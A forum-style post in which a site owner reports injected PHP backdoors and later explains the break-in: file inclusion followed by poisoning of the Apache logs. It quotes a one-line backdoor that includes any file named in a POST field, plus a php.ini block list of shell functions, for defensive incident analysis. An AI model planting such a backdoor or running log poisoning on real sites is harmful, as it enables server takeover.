So I found an injected code on a website. A couple of php files were prepended with an obfuscated code, which evaluates to a script that allows accessing other files in the filesystem and executing terminal commands. A few other pages were injected with this simple code:
<?php
if(isset($_POST{"VXzGE"})) include_once($_POST{"VXzGE"});
I am told there there hasn’t been any breach to the server itself, so the only way I can think of for this breach to be possible would be via insecure form. Assuming the site has several forms:
- some forms upload files
- some save info in database
- other only save a cookie depending on the submitted form contents
How could I check where the injection come from?
I am sure there must be some common ways of doing this kind of thing, what are they?
FYI my server has these functions disabled via php.ini:
disable_functions = "apache_child_terminate, escapeshellarg, escapeshellcmd, exec, fp, fput, highlight_file, passthru, php_uname, popix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, prce, system"
For future reference I’ll disclose the hole that was used to inject the code.
Firstly, there was a single insecure file that with an obvious hole:
This didn’t give the attacker write access to the filesystem yet, but since the website had access to the whole filesystem it was able to read Apache log files (Apache not chrooted and unsafe file permissions). Attacker found that hole and this allowed him to plant a malicious code in the url which got executed the moment he read the Apache log file.
So in the end an obvious hole and a couple other oversights allow this code injection.
Unsafe file deleted, holes patched up – lesson learned.